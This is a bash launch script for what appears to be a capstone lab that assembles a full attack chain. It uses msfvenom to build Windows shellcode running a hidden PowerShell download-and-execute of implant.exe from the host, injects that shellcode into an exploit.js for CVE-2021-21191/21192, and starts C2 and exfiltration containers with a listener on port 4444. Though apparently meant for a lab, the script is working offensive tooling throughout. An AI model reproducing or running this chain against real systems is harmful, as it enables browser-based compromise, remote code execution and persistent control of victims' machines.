#!/bin/bash

# ─────────────────────────────────────────────
#  Capstone Docker Lab — Launch Script
# ─────────────────────────────────────────────

set -e

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
ENV_FILE="$SCRIPT_DIR/.env"
COMPOSE_FILE="$SCRIPT_DIR/docker-compose.yml"

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

echo ""
echo -e "${CYAN}================================================${NC}"
echo -e "${CYAN}       Capstone Docker Lab — Launch Script      ${NC}"
echo -e "${CYAN}================================================${NC}"
echo ""

# ── 1. Check dependencies ─────────────────────
echo -e "${YELLOW}[*] Checking dependencies...${NC}"

if ! command -v docker &>/dev/null; then
    echo -e "${RED}[!] Docker is not installed. Install it and try again.${NC}"
    exit 1
fi

if ! docker compose version &>/dev/null; then
    echo -e "${RED}[!] Docker Compose plugin not found. Install it and try again.${NC}"
    exit 1
fi

echo -e "${GREEN}[+] Docker and Docker Compose found.${NC}"

# ── 2. Detect available host IPs ─────────────
echo ""
echo -e "${YELLOW}[*] Detecting network interfaces...${NC}"

mapfile -t IFACES < <(ip -o -4 addr show | awk '{print $2, $4}' | grep -v '^lo ' | grep -v '127\.')

if [ ${#IFACES[@]} -eq 0 ]; then
    echo -e "${RED}[!] No non-loopback IPv4 interfaces found.${NC}"
else
    echo "    Available IPs:"
    for iface in "${IFACES[@]}"; do
        IFACE_NAME=$(echo "$iface" | awk '{print $1}')
        IFACE_IP=$(echo "$iface" | awk '{print $2}' | cut -d'/' -f1)
        echo -e "      ${GREEN}$IFACE_NAME${NC} → $IFACE_IP"
    done
fi

# ── 3. Prompt for host IP ─────────────────────
echo ""
if [ ! -f "$ENV_FILE" ]; then
    echo -e "${YELLOW}[*] No .env file found — creating one now.${NC}"
fi

CURRENT_IP=$(grep -oP '(?<=C2_HOST_IP=)\S+' "$ENV_FILE" 2>/dev/null || echo "")

if [ -n "$CURRENT_IP" ]; then
    echo -e "${YELLOW}[*] Current C2_HOST_IP in .env: ${GREEN}$CURRENT_IP${NC}"
    read -rp "    Enter new host IP (or press Enter to keep '$CURRENT_IP'): " INPUT_IP
    HOST_IP="${INPUT_IP:-$CURRENT_IP}"
else
    echo "    Available IPs:"
    ip -o -4 addr show | awk '{print $2, $4}' | grep -v '^lo ' | grep -v '127\.' | while read -r iface ip; do
        echo -e "      ${GREEN}$iface${NC} → ${ip%/*}"
    done
    echo ""
    read -rp "    Enter your Linux host IP (e.g. 192.168.1.100): " HOST_IP
fi

# Validate IP format
if ! echo "$HOST_IP" | grep -qE '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
    echo -e "${RED}[!] Invalid IP address: '$HOST_IP'. Exiting.${NC}"
    exit 1
fi

echo -e "${GREEN}[+] Using C2_HOST_IP=${HOST_IP}${NC}"

# Write to .env
cat > "$ENV_FILE" <<EOF
# Your Linux host IP address — baked into implant.exe at build time.
# Regenerated by launch.sh on $(date)
C2_HOST_IP=${HOST_IP}
EOF

echo -e "${GREEN}[+] .env written.${NC}"

# ── 4. Generate shellcode + patch exploit.js ──
echo ""
echo -e "${YELLOW}[*] Generating shellcode and patching exploit.js...${NC}"

EXPLOIT_JS="$SCRIPT_DIR/exfil-server/CVE-2021-21191---CVE-2021-21192/exploit.js"
SHELLCODE_BIN="$SCRIPT_DIR/shellcode.bin"

if ! command -v msfvenom &>/dev/null; then
    echo -e "${YELLOW}[!] msfvenom not found — skipping shellcode generation.${NC}"
    echo -e "    Install Metasploit and run ./generate_shellcode.sh manually before rebuilding."
else
    POWERSHELL_CMD="powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://${HOST_IP}:8000/implant.exe','C:\\\\Windows\\\\Temp\\\\implant.exe'); Start-Process 'C:\\\\Windows\\\\Temp\\\\implant.exe'\""

    msfvenom \
        -p windows/x64/exec \
        CMD="$POWERSHELL_CMD" \
        -f raw \
        -o "$SHELLCODE_BIN" 2>/dev/null

    if [ ! -f "$SHELLCODE_BIN" ]; then
        echo -e "${RED}[!] msfvenom failed to produce shellcode.bin. Exiting.${NC}"
        exit 1
    fi

    BYTE_COUNT=$(wc -c < "$SHELLCODE_BIN")
    echo -e "${GREEN}[+] shellcode.bin generated (${BYTE_COUNT} bytes).${NC}"

    SHELLCODE_ARRAY=$(python3 - "$SHELLCODE_BIN" <<'PYEOF'
import struct, sys
with open(sys.argv[1], 'rb') as f:
    data = f.read()
remainder = len(data) % 4
if remainder:
    data += b'\x00' * (4 - remainder)
ints = struct.unpack('<' + 'I' * (len(data) // 4), data)
print('[' + ', '.join(str(i) for i in ints) + ']')
PYEOF
)

    cp "$EXPLOIT_JS" "${EXPLOIT_JS}.bak"

    python3 - "$EXPLOIT_JS" "$SHELLCODE_ARRAY" <<'PYEOF'
import sys, re
exploit_path = sys.argv[1]
new_array    = sys.argv[2]
with open(exploit_path, 'r') as f:
    content = f.read()
new_line = 'var shellcode = ' + new_array + ';'
patched, count = re.subn(r'^var shellcode = \[.*?\];', new_line, content, flags=re.MULTILINE)
if count == 0:
    print("ERROR: could not find 'var shellcode = [...]' in exploit.js")
    sys.exit(1)
with open(exploit_path, 'w') as f:
    f.write(patched)
PYEOF

    rm -f "$SHELLCODE_BIN"
    echo -e "${GREEN}[+] exploit.js patched with shellcode for ${HOST_IP}.${NC}"
fi

# ── 6. Check for existing containers ─────────
echo ""
echo -e "${YELLOW}[*] Checking for existing lab containers...${NC}"

RUNNING=$(docker ps --filter "name=c2-server" --filter "name=exfil-server" --format "{{.Names}}" 2>/dev/null)
STOPPED=$(docker ps -a --filter "name=c2-server" --filter "name=exfil-server" --format "{{.Names}}" 2>/dev/null)

if [ -n "$RUNNING" ]; then
    echo -e "${YELLOW}[!] Running containers found: $RUNNING${NC}"
    read -rp "    Stop and remove them before rebuilding? (Y/n): " CONFIRM
    CONFIRM="${CONFIRM:-Y}"
    if [[ "$CONFIRM" =~ ^[Yy]$ ]]; then
        echo -e "${YELLOW}[*] Stopping containers...${NC}"
        docker compose -f "$COMPOSE_FILE" down
        echo -e "${GREEN}[+] Containers stopped.${NC}"
    else
        echo -e "${RED}[!] Cannot rebuild while containers are running. Exiting.${NC}"
        exit 1
    fi
elif [ -n "$STOPPED" ]; then
    echo -e "${YELLOW}[!] Stopped containers found: $STOPPED${NC}"
    read -rp "    Remove them before rebuilding? (Y/n): " CONFIRM
    CONFIRM="${CONFIRM:-Y}"
    if [[ "$CONFIRM" =~ ^[Yy]$ ]]; then
        docker compose -f "$COMPOSE_FILE" down
        echo -e "${GREEN}[+] Old containers removed.${NC}"
    fi
else
    echo -e "${GREEN}[+] No existing lab containers found.${NC}"
fi

# ── 7. Check for port conflicts ───────────────
echo ""
echo -e "${YELLOW}[*] Checking for port conflicts (4444, 8000, 8888)...${NC}"

CONFLICT=0
for PORT in 4444 8000 8888; do
    if ss -tlnp 2>/dev/null | grep -q ":${PORT} "; then
        echo -e "${RED}[!] Port $PORT is already in use.${NC}"
        CONFLICT=1
    fi
done

if [ $CONFLICT -eq 1 ]; then
    read -rp "    Port conflicts detected. Continue anyway? (y/N): " CONFIRM
    CONFIRM="${CONFIRM:-N}"
    if [[ ! "$CONFIRM" =~ ^[Yy]$ ]]; then
        echo -e "${RED}[!] Exiting. Free up the conflicting ports and try again.${NC}"
        exit 1
    fi
else
    echo -e "${GREEN}[+] No port conflicts.${NC}"
fi

# ── 8. Build and launch ───────────────────────
echo ""
echo -e "${YELLOW}[*] Building and launching containers (this may take a few minutes)...${NC}"
echo ""

docker compose -f "$COMPOSE_FILE" up --build -d

# ── 9. Verify containers are running ─────────
echo ""
echo -e "${YELLOW}[*] Verifying containers started...${NC}"
sleep 3

ALL_UP=1
for NAME in c2-server exfil-server; do
    STATUS=$(docker inspect --format='{{.State.Status}}' "$NAME" 2>/dev/null || echo "missing")
    if [ "$STATUS" = "running" ]; then
        echo -e "    ${GREEN}[+] $NAME is running${NC}"
    else
        echo -e "    ${RED}[!] $NAME is NOT running (status: $STATUS)${NC}"
        ALL_UP=0
    fi
done

# ── 10. Summary ───────────────────────────────
echo ""
echo -e "${CYAN}================================================${NC}"
echo -e "${CYAN}                    Summary                     ${NC}"
echo -e "${CYAN}================================================${NC}"
echo ""
echo -e "  C2 listener      → ${GREEN}localhost:4444${NC}  (TCP)"
echo -e "  Exploit webpage  → ${GREEN}http://localhost:8888${NC}"
echo -e "  File server      → ${GREEN}http://localhost:8000${NC}"
echo ""
echo -e "  From Windows VM:"
echo -e "  Exploit webpage  → ${GREEN}http://${HOST_IP}:8888${NC}"
echo -e "  Download implant → ${GREEN}http://${HOST_IP}:8000/implant.exe${NC}"
echo -e "  C2 connects to   → ${GREEN}${HOST_IP}:4444${NC}  (baked into implant.exe)"
echo ""
echo -e "  Attach to C2 controller:"
echo -e "    ${CYAN}sudo docker attach c2-server${NC}"
echo -e "  Detach without stopping: ${CYAN}Ctrl+P then Ctrl+Q${NC}"
echo ""

if [ $ALL_UP -eq 1 ]; then
    echo -e "${GREEN}[+] Lab is up and ready.${NC}"
else
    echo -e "${RED}[!] One or more containers failed to start. Check logs:${NC}"
    echo -e "    ${CYAN}docker compose logs -f${NC}"
fi

echo ""
